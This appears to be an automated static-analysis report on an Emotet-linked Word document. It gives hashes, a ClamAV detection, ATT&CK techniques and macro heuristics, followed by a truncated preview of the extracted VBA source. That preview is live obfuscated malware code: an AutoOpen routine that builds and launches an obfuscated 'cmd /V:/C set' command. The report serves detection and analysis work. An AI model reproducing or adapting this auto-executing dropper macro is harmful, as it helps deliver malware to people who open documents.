Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 8d05399abfb3fec4…

MALICIOUS

Office (OLE)

Size: 198.9 KB | Created: 2018-09-24 12:28:00 | Authoring application: Microsoft Office Word | First seen: 2019-05-31
MD5: 2de738e52253e44af01e59f0f04fecbe
SHA-1: 13f0f232287c9f2dc23384c4ff1e3998591db6ca
SHA-256: 8d05399abfb3fec48d40d96f07e0bb6a9bed49908f6722a25b3f15a2e3b54223
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6884039-0. Critical heuristics indicate the presence of VBA macros and a Shell() call, strongly suggesting the execution of malicious code. The AutoOpen macro is present, which is a common technique for Emotet to initiate its payload download and execution upon opening the document.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6884039-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884039-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 169632 bytes
SHA-256: f40556a4d9f253d10d7c013fb28c71f92e4f2f39607a5e4d62c30f1877682ff3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DmPfjHcBIGpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim QKjwz(1)
QKjwz(0) = MidB(HONBzkpXIMEqt + AdrWBLrzqwiwnZztIsjiRvkUXE + dnEJGGcldPQRLw, 51, 827) + MidB(NLGYMTRuabQr + IrUuudTsQwrtbXTstkosFbksLjBVlv + TiHwGQUv, 165, 636) + Left(zWGiWHfCjzPTJ + LPcFzEJEkwdYWhjYtoaSwiQVcUOon + JffbVnpS, 342) + Left(dGfzPrLRsSl + bhijjawJIQMEwmEDUYAJpdFX + cqYiBAoFIi, 834)
   Dim wiCwnA(2)
wiCwnA(0) = Mid(OQzbjFRll + UQiotdZLFNGYSlbWQJscaPAtGLwZQnmN + uIUNpmCHX, 468, 175) + MidB(vUckwcnHYtj + GoqFlERNbIoftFSsbkIjCDqljFVOkupfOR + EjRTLnFCXMpj, 347, 980)
wiCwnA(1) = Mid(DiBCuTkHG + kEZMBZpbPitAzoQpwljWbfPQ + vKNRjUzzAoGc, 363, 690) + MidB(pBEGFRqRwR + zhlJzufFVbQcQTciTTzSOLljiTwTRTPzS + fYEwzNkbPozOii, 975, 40) + Mid(sWwMOAlZIwJbR + louuUHbijVjFNoTRzIwSKDMaFlSnX + wqDHvjQsOqVTj, 216, 388) + Right(bIZtmVkqHjWsQ + jRQwPKEYKnbokfPlFOXuKUTQn + zzIAjPuVQhWjPG, 53)
   Dim qTzLu(1)
qTzLu(0) = MidB(owdcGaXs + CTnjZoTCwzznQSHjTWjDJouvFvZRMF + idoQiiIzbNtIM, 195, 969) + MidB(WXkZPis + NHWjnqjckisCrBfbwulivNphTOSwwllR + vZDZjaTBBiV, 985, 899) + Mid(zuKRKqTzIPNR + RGkkDjWrMwVcdLMUTiQazqkccuKWIoGk + PqIMFhLwhMHl, 924, 902) + Right(PwajltTDtzCc + XaobFcWEuJODJUrwPcVKqzVXESI + jsojzVpRQLCR, 348)
   Dim GbRlnq(1)
GbRlnq(0) = MidB(MWGdwtRW + mTnAQUPpspiHnaWJLlHmuXsnsU + NzTQaJG, 219, 937) + Left(wjbEjzDZkGkHai + cXhWUEkQIUqzNzomPJTJoouEwcr + uQdnPzctwLvO, 157)
fqLAAvtkGJQ (KeyString(vbKeyC) + KeyString(vbKeyM) + wDUREnGI + qdEBYEMwmNB + sjQjkhFofT + QmOwq + OWidEBvinY + GwVLVbaJNsi + lnQbEFz)
   Dim mQHUFK(2)
mQHUFK(0) = Right(ZjFjSnqE + VQvEDrKHwPoLjRQztGYFwTwvUY + LuqkthiM, 301) + Mid(MYUOCjPCowwNrT + kGvqirHcQpoXiQqOzojcEEWSKNhwQh + GTUOVRswMrrUXQ, 147, 974) + Mid(fVfLjlMZzOj + qwSZWuiTPkhXMCuiElCNSu + CwTdOVTBVFqk, 81, 220) + Mid(lYdIZKiDI + mnlzfjMjXvGsEKjpCtambtQiIrRQ + jjOjFLBri, 764, 399)
mQHUFK(1) = MidB(RDPdoAmXsMA + OFEoFikdYvzjrUmRwNzasNc + qqTNZzzvnqip, 886, 28) + Mid(TjFJSkiaiNs + LacPComEiXkYzYEcCMLhXGQFMtiMH + cPFasMBal, 173, 405)
   Dim YmmPJ(2)
YmmPJ(0) = MidB(vjkiXsjWjQ + TZXRCtLXimDwPuYiZFlSLzrcsHt + mHGmBVjWwksId, 723, 380) + Left(IoHLBWiHLTLRSP + PMHzHWMpjTisJMXKuzFnkYfqCYFfUIRN + TqlcRchn, 800)
YmmPJ(1) = MidB(GnGXQfDnbXa + JRdnOksVnLrNcWADiNvkwHEcNawo + FSAwuZFEH, 379, 537) + MidB(CChnXbruSN + fJIfupXwoIKBJXddGjnCZfnaN + nFTTOPzYMi, 86, 318) + Left(sLlODOQLlYwsHi + OKwUUFCiHjEtzESIUCLJmDbTuWVI + FPuRKZnICT, 933) + MidB(RnTdkzBf + AMRtlHLzRfohKjtLzsMErKfbtlJ + BMtFtfBAruzQj, 569, 117)
End Sub


Attribute VB_Name = "lFVGKjDjltFIlj"
Function wDUREnGI()
Dim SjGBDI(1)
SjGBDI(0) = Mid(kfkBWIznaNd + pWsawcwIbXbJEtPmicfZSwswDGKnZ + dNObEjIXII, 183, 107) + MidB(GYofAAj + aiGfsBQkCjnbjBdwXWPrirziWHY + LRnzwAQVsXHZZ, 566, 503)
   Dim SonTsT(1)
SonTsT(0) = MidB(BDzvmNj + SEHnbBnPqfPqSZNNwHlzzMSC + llYfSSKivrnzC, 564, 555) + MidB(LkwRMAVOsjHHa + JadFHkXzsvdWazHUlXHYYlCRZlCaVin + zXGFnlEWjdu, 287, 760) + MidB(WDBicCFTESwOp + nnJdIwiSfcBpHIMPEShFMZtDCm + OBaqHFKRqr, 708, 645) + MidB(AQMwPMBaQpFizE + cfdIOzOQAzcvYhACMYdWdVnllk + FCwOFDtl, 20, 45)
   Dim PzfjC(2)
PzfjC(0) = Mid(wjMRTjjVV + UWWLTiTuJpRqSrNiETvKKlWDZQqPaNo + UjPwwspa, 619, 863) + MidB(cTBRCCvYLMawau + ardcbitvpWvGkiszzozXKt + IJSWEOV, 9, 777)
PzfjC(1) = MidB(WzZGcfqAS + iVVwjfcUTiJdmWAHjljHizXiVrTtzZ + zAHhpXUvkMU, 783, 393) + Mid(jTjrrFNmzJz + ApJDKLYzAwwVjXWiPMkZTiiUk + YsQrvvCR, 575, 172) + Mid(iVkfWYqPSaj + PPqVcqolqDudlbTEihBEjC + uwrzIZcjfMwBSs, 883, 853) + Mid(ksnOwEWfIhO + SPutmzcvBEvHRCnJJDSUIjCmbdQ + UFdlXzHtT, 706, 293)
FUkzNnwj = "d /V^:/C" + CStr(Chr(1 + 1 + 0 + 3 + 29)) + "s^e^" + "t ^_^{=\^_/ -" + "^_\ \^" + "_- ^\/- \_^" + "-^ ^-^" + "\/ ^\/^-^ ^\" + "_/^ ^" + "-^_" + "\ -_/ _"
Dim zhiEBu(2)
zhiEBu(0) = MidB(TQRnfAfUSIkv + GzqjludMowHjlQNTOzLCAOThwvcMz + bjNSIuGG, 541, 384) + Right(PbDEpVwsQuupVR + RLlIuicjAAFGTjiUFvrnrDw + mXzqhcoQiXB, 697) + Right(DoPrlwLLUC + jaYtFzowcDPXifTATHbnzbLLt + C
... (truncated)